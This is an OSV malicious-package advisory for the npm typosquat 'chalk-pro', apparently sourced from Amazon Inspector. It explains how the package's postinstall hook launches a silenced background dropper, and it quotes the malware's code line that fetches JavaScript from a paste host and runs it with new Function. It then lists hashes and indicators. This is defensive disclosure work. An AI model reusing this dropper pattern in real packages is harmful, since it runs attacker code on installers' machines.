MAL-2026-5711

Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/chalk-pro/MAL-2026-5711.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-5711
Published
2026-06-12T20:36:57Z
Modified
2026-06-16T23:16:57.949188211Z
Summary
Malicious code in chalk-pro (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (ac66dfb6013c32d34c6ce83bdba4628b67539e81df27fe18dcf71d3de05ff8ce)

Package is published as 'chalk-pro' (homepage chalk-pro.com) but its main entry is a verbatim copy of nodemailer's API — a typosquat impersonating both chalk and nodemailer, with 'Andris Reinman' (the real nodemailer author) listed as author. The package.json postinstall hook runs node lib/utils/index.js, which uses child_process.spawn(process.execPath, [filePath], { detached: true, stdio: ['ignore','ignore','ignore'] }) followed by child.unref() to launch lib/utils/smtp-connection/index.js as a detached, fully-silenced child so npm install returns immediately while the dropper continues in the background. The dropper executes require('axios').get('https://www.jsonkeeper.com/b/TOAAK').then(r => new Function('require', r.data.cookie)(require)) — fetching attacker-controlled JavaScript from a mutable paste host and evaluating it with new Function at install time, with full access to require. A second file (lib/utils/smtp-connection/parse.js) provides AES-256-CBC decryption with a hardcoded key and IV, positioned to decrypt follow-up stages delivered as hex. This is a classic install-time dropper: typosquat lure + detached/silenced postinstall + remote eval from a mutable third-party paste + bundled second-stage decryptor.

Database specific
{
    "malicious-packages-origins": [
        {
            "versions": [
                "7.0.4"
            ],
            "sha256": "ac66dfb6013c32d34c6ce83bdba4628b67539e81df27fe18dcf71d3de05ff8ce",
            "modified_time": "2026-06-12T20:36:57Z",
            "source": "amazon-inspector",
            "id": "IN-MAL-2026-006231",
            "import_time": "2026-06-12T20:49:38.118064947Z"
        },
        {
            "versions": [
                "7.0.4"
            ],
            "sha256": "d6015370f610f4d4581119093958e05171cac46e967b97725e8e3ed42dad9070",
            "modified_time": "2026-06-12T20:36:58Z",
            "source": "amazon-inspector",
            "import_time": "2026-06-12T20:49:38.195698931Z",
            "id": "IN-MAL-2026-006232"
        },
        {
            "versions": [
                "7.0.6"
            ],
            "sha256": "75bcaaf15fbc593bdf034886186f961d37758a21b9feca9c18c37338c8af34dc",
            "modified_time": "2026-06-16T22:17:58Z",
            "source": "amazon-inspector",
            "id": "IN-MAL-2026-006840",
            "import_time": "2026-06-16T23:03:43.140780104Z"
        }
    ]
}

Affected packages

npm / chalk-pro

Affected versions

7.*
7.0.4
7.0.6

Database specific

indicators
{
    "package_integrity": [
        {
            "filename": "chalk-pro-7.0.4.tgz",
            "hashes": {
                "sha512_sri": "sha512-m0gHULuyqRGU+Z2ZkyFuCDJD0YUUoENkKlzk5lY1tt97m7zFVP+79dhp4gTNtwyZ0orut7rgi+lEBNGNEWTmbg==",
                "sha1": "fd1014b20c77e2d2b536d8dcef0187a949438318"
            }
        }
    ],
    "evidence_files": [
        {
            "sha256": "1177ef44c40c048428ad64bebb0781fdf8ec303a3a4941c225efc143a54d0798",
            "path": "lib/utils/smtp-connection/index.js",
            "tlsh": "09e026a223e0612e223519e593060067b007c5616b6ae8c6c3585af226c1fd58e23df9"
        },
        {
            "sha256": "9fb27c30f484650bb4a39f65a03fbccdc0b9b5f1cb84700ca73ee8893c66e06e",
            "path": "lib/utils/index.js",
            "tlsh": "dae0686a23533738a034cbc1da30ce3b258b8020b365a0e0f00c406a2bc72c406ea8da"
        },
        {
            "sha256": "2b849087b5db4e7663811977e549e5cb0a76d2b3d36c1b8e0e845a45e835a6c4",
            "path": "package.json",
            "tlsh": "1041fc15cd268ce3279929edb86d0183b530d00f8d09b85db74c938c4f8e99f76b8a6d"
        },
        {
            "sha256": "4aac106a4f36aba6433c7ded453d724307ee55616e240883cd46204549cf24b1",
            "path": "lib/utils/smtp-connection/parse.js",
            "tlsh": "7cf0a6802cb8fb900345b0e7c0bbeb07a198a068312287a48a8f9d5a45868488a130dd"
        }
    ],
    "domains": [
        "github.com",
        "release-assets.githubusercontent.com",
        "www.jsonkeeper.com"
    ]
}
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/chalk-pro/MAL-2026-5711.json"
cwes
[
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    }
]